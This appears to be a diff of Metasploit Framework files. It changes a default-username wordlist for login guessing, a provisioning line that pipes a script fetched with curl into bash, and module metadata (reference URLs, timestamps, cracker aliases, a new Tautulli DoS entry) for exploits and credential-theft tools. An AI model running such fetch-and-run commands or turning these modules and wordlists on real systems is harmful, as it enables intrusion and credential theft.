+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
@@ -1,88 +1,131 @@

 4Dgifts
-EZsetup
-OutOfBox
-ROOT
+abrt
 adm
 admin
 administrator
 anon
+_apt
+arpwatch
 auditor
 avahi
 avahi-autoipd
 backup
 bbs
+beef-xss
 bin
+bitnami
 checkfs
 checkfsys
 checksys
 chronos
+chrony
 cmwlogin
+cockpit-ws
+colord
 couchdb
+cups-pk-helper
 daemon
 dbadmin
+dbus
+Debian-exim
+Debian-snmp
 demo
 demos
 diag
 distccd
 dni
+dnsmasq
+dradis
+EZsetup
 fal
 fax
 ftp
 games
 gdm
+geoclue
 gnats
+gnome-initial-setup
 gopher
 gropher
 guest
 haldaemon
 halt
 hplip
+inetsim
 informix
 install
+iodine
 irc
+jet
 karaf
 kernoops
+king-phisher
+landscape
+libstoragemgmt
 libuuid
+lightdm
 list
 listen
 lp
 lpadm
 lpadmin
+lxd
 lynx
 mail
 man
 me
 messagebus
+miredo
 mountfs
 mountfsys
 mountsys
+mysql
 news
 noaccess
 nobody
 nobody4
+ntp
 nuucp
+nxautomation
 nxpgsql
+omi
+omsagent
 operator
 oracle
+OutOfBox
 pi
+polkitd
+pollinate
 popr
+postfix
 postgres
 postmaster
 printer
 proxy
 pulse
+redsocks
 rfindd
 rje
 root
+ROOT
 rooty
+rpc
+rpcuser
+rtkit
+rwhod
 saned
 service
+setroubleshoot
 setup
 sgiweb
+shutdown
 sigver
 speech-dispatcher
 sshd
+sslh
+sssd
+stunnel4
 sym
 symop
 sync
@@ -92,22 +135,34 @@ sysadmin
 sysbin
 syslog
 system_admin
+systemd-bus-proxy
+systemd-coredump
+systemd-network
+systemd-resolve
+systemd-timesync
+tcpdump
 trouble
+tss
 udadmin
 ultra
 umountfs
 umountfsys
 umountsys
 unix
+unscd
 us_admin
+usbmux
 user
 uucp
 uucpadm
+uuidd
+vagrant
+varnish
 web
 webmaster
+whoopsie
 www
 www-data
 xpdb
 xpopr
 zabbix
-vagrant
@@ -64,7 +64,7 @@
    ],
    "description": "This module combines two vulnerabilities to achieve remote code\n        execution on affected Android devices. First, the module exploits\n        CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in\n        versions of Android's open source stock browser (the AOSP Browser) prior to\n        4.4. Second, the Google Play store's web interface fails to enforce a\n        X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be\n        targeted for script injection. As a result, this leads to remote code execution\n        through Google Play's remote installation feature, as any application available\n        on the Google Play store can be installed and launched on the user's device.\n\n        This module requires that the user is logged into Google with a vulnerable browser.\n\n        To list the activities in an APK, you can use `aapt dump badging /path/to/app.apk`.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
+      "URL-https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041",
      "URL-http://1337day.com/exploit/description/22581",
      "OSVDB-110664",
      "CVE-2014-6041"
@@ -79,7 +79,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb",
    "is_install_path": true,
    "ref_name": "admin/android/google_play_store_uxss_xframe_rce",
@@ -198,7 +198,7 @@
    ],
    "description": "This module acts as a simplistic administrative client for interfacing\n        with Veeder-Root Automatic Tank Gauges (ATGs) or other devices speaking\n        the TLS-250 and TLS-350 protocols.  This has been tested against\n        GasPot and Conpot, both honeypots meant to simulate ATGs; it has not\n        been tested against anything else, so use at your own risk.",
    "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/01/22/the-internet-of-gas-station-tank-gauges",
+      "URL-https://blog.rapid7.com/2015/01/22/the-internet-of-gas-station-tank-gauges",
      "URL-http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-gaspot-experiment",
      "URL-https://github.com/sjhilt/GasPot",
      "URL-https://github.com/mushorg/conpot",
@@ -216,7 +216,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/atg/atg_client.rb",
    "is_install_path": true,
    "ref_name": "admin/atg/atg_client",
@@ -1204,7 +1204,7 @@
      "CVE-2015-0964",
      "CVE-2015-0965",
      "CVE-2015-0966",
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
+      "URL-https://blog.rapid7.com/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems"
    ],
    "platform": "",
    "arch": "",
@@ -1216,7 +1216,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb",
    "is_install_path": true,
    "ref_name": "admin/http/arris_motorola_surfboard_backdoor_xss",
@@ -2661,7 +2661,7 @@
    "references": [
      "CVE-2013-0136",
      "US-CERT-VU-701572",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/05/15/new-1day-exploits-mutiny-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
@@ -2682,7 +2682,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb",
    "is_install_path": true,
    "ref_name": "admin/http/mutiny_frontend_read_delete",
@@ -2907,7 +2907,7 @@
    ],
    "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n        of vectors. This vulnerability can allow an attacker to a craft special XML that\n        could read arbitrary files from the filesystem. This module exploits the\n        vulnerability via the XML API.",
    "references": [
-      "URL-https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24"
+      "URL-https://blog.rapid7.com/2013/08/16/r7-vuln-2013-07-24"
    ],
    "platform": "",
    "arch": "",
@@ -2928,7 +2928,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-10-09 17:06:05 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb",
    "is_install_path": true,
    "ref_name": "admin/http/nexpose_xxe_file_read",
@@ -3054,7 +3054,7 @@
      "CVE-2013-3617",
      "OSVDB-99141",
      "BID-63431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
+      "URL-https://blog.rapid7.com/2013/10/30/seven-tricks-and-treats"
    ],
    "platform": "",
    "arch": "",
@@ -3075,7 +3075,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
    "is_install_path": true,
    "ref_name": "admin/http/openbravo_xxe",
@@ -4558,7 +4558,7 @@
      "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
      "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
      "URL-https://github.com/bidord/pykek",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
+      "URL-https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
    ],
    "platform": "",
    "arch": "",
@@ -4570,7 +4570,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -6733,7 +6733,7 @@
    "description": "This module allows an unauthenticated user to interact with the Yokogawa\n        CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR\n        operations.",
    "references": [
      "CVE-2014-5208",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
+      "URL-https://blog.rapid7.com/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access"
    ],
    "platform": "",
    "arch": "",
@@ -6745,7 +6745,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-09-24 12:15:43 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb",
    "is_install_path": true,
    "ref_name": "admin/scada/yokogawa_bkbcopyd_client",
@@ -7946,7 +7946,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-03-04 19:25:56 +0000",
+    "mod_time": "2020-02-19 01:06:50 +0000",
    "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
    "is_install_path": true,
    "ref_name": "admin/wemo/crockpot",
@@ -8083,10 +8083,10 @@
    "name": "Password Cracker: Databases",
    "fullname": "auxiliary/analyze/crack_databases",
    "aliases": [
-      "auxiliary/analyze/jtr_mssql",
-      "auxiliary/analyze/jtr_mysql",
-      "auxiliary/analyze/jtr_oracle",
-      "auxiliary/analyze/jtr_postgres"
+      "auxiliary/analyze/jtr_mssql_fast",
+      "auxiliary/analyze/jtr_mysql_fast",
+      "auxiliary/analyze/jtr_oracle_fast",
+      "auxiliary/analyze/jtr_postgres_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8110,7 +8110,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_databases.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_databases",
@@ -8275,8 +8275,7 @@
    "name": "Password Cracker: Windows",
    "fullname": "auxiliary/analyze/crack_windows",
    "aliases": [
-      "auxiliary/analyze/jtr_crack_fast",
-      "auxiliary/analyze/jtr_windows"
+      "auxiliary/analyze/jtr_windows_fast"
    ],
    "rank": 300,
    "disclosure_date": null,
@@ -8300,7 +8299,7 @@

    ],
    "targets": null,
-    "mod_time": "2019-10-08 20:31:23 +0000",
+    "mod_time": "2020-02-06 10:23:53 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -8311,270 +8310,6 @@
    },
    "needs_cleanup": false
  },
-  "auxiliary_analyze/jtr_aix": {
-    "name": "John the Ripper AIX Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_aix",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from passwd files on AIX systems.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_aix.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_aix",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_linux": {
-    "name": "John the Ripper Linux Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_linux",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from unshadowed passwd files from Unix systems. The module will only crack\n        MD5, BSDi and DES implementations by default. Set Crypt to true to also try to crack\n        Blowfish and SHA(256/512). Warning: This is much slower.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_linux.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_linux",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mssql_fast": {
-    "name": "John the Ripper MS SQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mssql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mssql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mssql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mssql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_mysql_fast": {
-    "name": "John the Ripper MySQL Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_mysql_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the mysql_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_mysql_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_mysql_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_oracle_fast": {
-    "name": "John the Ripper Oracle Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_oracle_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>",
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired from the oracle_hashdump module. Passwords that have been successfully\n        cracked are then saved as proper credentials.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_oracle_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_oracle_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_postgres_fast": {
-    "name": "John the Ripper Postgres SQL Password Cracker",
-    "fullname": "auxiliary/analyze/jtr_postgres_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "theLightCosine <theLightCosine@metasploit.com>"
-    ],
-    "description": "This module uses John the Ripper to attempt to crack Postgres password\n          hashes, gathered by the postgres_hashdump module. It is slower than some of the other\n          JtR modules because it has to do some wordlist manipulation to properly handle postgres'\n          format.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_postgres_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_postgres_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
-  "auxiliary_analyze/jtr_windows_fast": {
-    "name": "John the Ripper Windows Password Cracker (Fast Mode)",
-    "fullname": "auxiliary/analyze/jtr_windows_fast",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "hdm <x@hdm.io>"
-    ],
-    "description": "This module uses John the Ripper to identify weak passwords that have been\n        acquired as hashed files (loot) or raw LANMAN/NTLM hashes (hashdump). The goal\n        of this module is to find trivial passwords in a short amount of time. To\n        crack complex passwords or use large wordlists, John the Ripper should be\n        used outside of Metasploit. This initial version just handles LM/NTLM credentials\n        from hashdump and uses the standard wordlist and rules.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [
-
-    ],
-    "autofilter_services": [
-
-    ],
-    "targets": null,
-    "mod_time": "2019-11-07 19:09:52 +0000",
-    "path": "/modules/auxiliary/analyze/jtr_windows_fast.rb",
-    "is_install_path": true,
-    "ref_name": "analyze/jtr_windows_fast",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "needs_cleanup": false
-  },
  "auxiliary_analyze/modbus_zip": {
    "name": "Extract zip from Modbus communication",
    "fullname": "auxiliary/analyze/modbus_zip",
@@ -9053,7 +8788,7 @@
    ],
    "description": "This module modifies a .docx file that will, upon opening, submit stored\n        netNTLM credentials to a remote host. It can also create an empty docx file. If\n        emailed the receiver needs to put the document in editing mode before the remote\n        server will be contacted. Preview and read-only mode do not work. Verified to work\n        with Microsoft Word 2003, 2007, 2010, and 2013. In order to get the hashes the\n        auxiliary/server/capture/smb module can be used.",
    "references": [
-      "URL-http://jedicorp.com/?p=534"
+      "URL-https://web.archive.org/web/20140527232608/http://jedicorp.com/?p=534"
    ],
    "platform": "",
    "arch": "",
@@ -9065,7 +8800,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-24 18:17:06 +0000",
    "path": "/modules/auxiliary/docx/word_unc_injector.rb",
    "is_install_path": true,
    "ref_name": "docx/word_unc_injector",
@@ -10296,7 +10031,7 @@
    "description": "This module exploits a heap overflow in NFRAgent.exe, a component of Novell\n        File Reporter (NFR). The vulnerability occurs when handling requests of name \"SRS\",\n        where NFRAgent.exe fails to generate a response in a secure way, copying user\n        controlled data into a fixed-length buffer in the heap without bounds checking.\n        This module has been tested against NFR Agent 1.0.4.3 (File Reporter 1.0.2).",
    "references": [
      "CVE-2012-4956",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -10317,7 +10052,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/http/novell_file_reporter_heap_bof.rb",
    "is_install_path": true,
    "ref_name": "dos/http/novell_file_reporter_heap_bof",
@@ -10512,6 +10247,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_dos/http/tautulli_shutdown_exec": {
+    "name": "Tautulli v2.1.9 - Shutdown Denial of Service",
+    "fullname": "auxiliary/dos/http/tautulli_shutdown_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Ismail Tasdelen"
+    ],
+    "description": "Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.",
+    "references": [
+      "CVE-2019-19833",
+      "EDB-47785"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8181,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-17 13:57:32 +0000",
+    "path": "/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb",
+    "is_install_path": true,
+    "ref_name": "dos/http/tautulli_shutdown_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_dos/http/ua_parser_js_redos": {
    "name": "ua-parser-js npm module ReDoS",
    "fullname": "auxiliary/dos/http/ua_parser_js_redos",
@@ -11545,7 +11327,7 @@
    "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n        of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n        exists in the handling of malformed log packets, with an unexpected long level field.\n        The root cause of the vulnerability is a combination of usage of uninitialized memory\n        from the stack and a dangerous string copy. This module has been tested successfully\n        on Yokogawa CENTUM CS 3000 R3.08.50.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0781"
    ],
    "platform": "",
@@ -11558,7 +11340,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb",
    "is_install_path": true,
    "ref_name": "dos/scada/yokogawa_logsvr",
@@ -11596,7 +11378,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-03-23 14:55:18 +0000",
+    "mod_time": "2020-02-25 19:59:27 +0000",
    "path": "/modules/auxiliary/dos/smb/smb_loris.rb",
    "is_install_path": true,
    "ref_name": "dos/smb/smb_loris",
@@ -12763,7 +12545,7 @@
      "URL-http://pastie.org/private/feg8du0e9kfagng4rrg",
      "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html",
      "EDB-18606",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update"
+      "URL-https://blog.rapid7.com/2012/03/21/metasploit-update"
    ],
    "platform": "",
    "arch": "",
@@ -12775,7 +12557,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb",
    "is_install_path": true,
    "ref_name": "dos/windows/rdp/ms12_020_maxchannelids",
@@ -14940,7 +14722,7 @@
    ],
    "description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n        inject cross-domain Javascript (UXSS), silently install a browser\n        extension, collect user information, steal the cookie database,\n        and steal arbitrary local files.\n\n        When opened on the target machine the webarchive file must not have the\n        quarantine attribute set, as this forces the webarchive to execute in a\n        sandbox.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
+      "URL-https://blog.rapid7.com/2013/04/25/abusing-safaris-webarchive-file-format"
    ],
    "platform": "",
    "arch": "",
@@ -14952,7 +14734,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
    "is_install_path": true,
    "ref_name": "gather/apple_safari_webarchive_uxss",
@@ -16029,7 +15811,7 @@
    "disclosure_date": null,
    "type": "auxiliary",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "This module checks for the public source IP address of the current\n        route to the RHOST by querying the public web application at ifconfig.me.\n        It should be noted this module will register activity on ifconfig.me,\n        which is not affiliated with Metasploit.",
    "references": [
@@ -16054,7 +15836,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/auxiliary/gather/external_ip.rb",
    "is_install_path": true,
    "ref_name": "gather/external_ip",
@@ -27726,7 +27508,7 @@
    "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n        with an FSFUI record with UICMD 126. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
    "references": [
      "CVE-2012-4958",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -27747,7 +27529,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
@@ -27773,7 +27555,7 @@
    "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n        CMD 103, specifying a full pathname. This module has been tested successfully\n        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n        Reporter 1.0.1).",
    "references": [
      "CVE-2012-4957",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "",
    "arch": "",
@@ -27795,7 +27577,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-03-05 03:38:51 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
@@ -28398,7 +28180,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-02-23 13:16:41 +0000",
+    "mod_time": "2020-02-25 10:14:02 +0000",
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
@@ -28702,7 +28484,7 @@
    "description": "This module attempts to identify Ruby on Rails instances vulnerable to\n        an arbitrary object instantiation flaw in the XML request processor.",
    "references": [
      "CVE-2013-0156",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
+      "URL-https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
    ],
    "platform": "",
    "arch": "",
@@ -28723,7 +28505,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_xml_yaml_scanner",
@@ -29548,7 +29330,7 @@
    "references": [
      "CVE-2013-3621",
      "CVE-2013-3623",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
@@ -29569,7 +29351,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/smt_ipmi_cgi_scanner",
@@ -29596,7 +29378,7 @@
    "description": "This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI\n        controllers. An attacker with access to the publicly-available firmware can perform\n        man-in-the-middle attacks and offline decryption of communication to the controller.\n        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware\n        version SMT_X9_214.",
    "references": [
      "CVE-2013-3619",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
+      "URL-https://blog.rapid7.com/2013/11/06/supermicro-ipmi-firmware-vulnerabilities"
    ],
    "platform": "",
    "arch": "",
